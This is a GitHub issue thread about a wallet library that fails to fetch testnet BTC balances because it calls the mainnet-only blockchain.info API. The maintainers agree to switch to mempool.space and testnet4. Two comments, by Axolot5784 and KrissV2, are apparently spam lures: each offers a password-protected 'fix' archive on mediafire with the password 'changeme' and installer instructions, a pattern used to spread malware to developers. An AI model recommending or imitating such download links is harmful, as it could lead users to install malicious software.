### ISSUE TITLE
 Error Fetching BTC Balance on Testnet

### ISSUE THREAD

**Issue by JoE11-y** [omnisat/lasereyes#38]
### Issue: Error Fetching BTC Balance on Testnet

**Description:**

When connected to the Bitcoin testnet, I'm encountering the following error:

```
Error: Failed to fetch BTC balance
```

This error occurs because the service is attempting to retrieve address information from [https://blockchain.info](https://blockchain.info) using the URL:

`https://blockchain.info/q/addressbalance/<testnetaddress>`

However, this endpoint does not support testnet addresses, leading to the failure.

**Steps to Reproduce:**
1. Switch LaserEyesProvider Config to the Bitcoin testnet.
2. Connect your wallet any of this  XVERSE, OYL, MAGIC_EDEN, OKX, LEATHER, PHANTOM
4. Observe the error message.

**Expected Behavior:**
The service should use a testnet-compatible block explorer or API to fetch the balance for testnet addresses.

**Actual Behavior:**
The service incorrectly tries to fetch the balance using Blockchain.info, which only supports mainnet addresses.

**Possible Solutions:**
- Update the service to use a testnet-compatible explorer, such as:
  - [BlockCypher Testnet Explorer](https://live.blockcypher.com/btc-testnet/)
  - [Blockstream Testnet Explorer](https://blockstream.info/testnet/)

**Environment:**
- Testnet

**Comment by Axolot5784** [comment]
Download 
https://www.mediafire.com/file/3hzk77cxvxc9nq2/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by JoE11-y** [comment]
Anychance this gets looked at @hathbanger @0xBunzy.

**Comment by hathbanger** [comment]
@JoE11-y sounds like a plan. We'll need to shift around our utxo type to best suit their response but other then that should be p chill. Also would like to get segwit and fractal fully supported as well.

**Comment by hathbanger** [comment]
@JoE11-y looks like blockcypher requires an api key, blockstream's looking p nice tho.

**Comment by hathbanger** [comment]
so which testnet should we support @JoE11-y? i'm leaning towards 4 over 3 as 3's otw to being deprecated. i think we lean into mempool.space's api which has 3,4,segwit and then there are fractal based mempool.spaces out there we can hook into, keeping the utxo type the same across the board.

**Comment by JoE11-y** [comment]
Yeah @hathbanger that's true testnet4 will be the way to go.
Exactly so mempool.space will be perfect then.

**Comment by JoE11-y** [comment]
I actually did make a PR earlier maybe you could also take a look at it @hathbanger.

**Comment by hathbanger** [comment]
@JoE11-y i saw it after the fact 😫 i saw the issue you raised on my phone and i didn't dig any further to see the pr. sorry bro. never again.

**Comment by JoE11-y** [comment]
Haha it's all cool brother.
Glad to have helped. 💪💪💪 😁
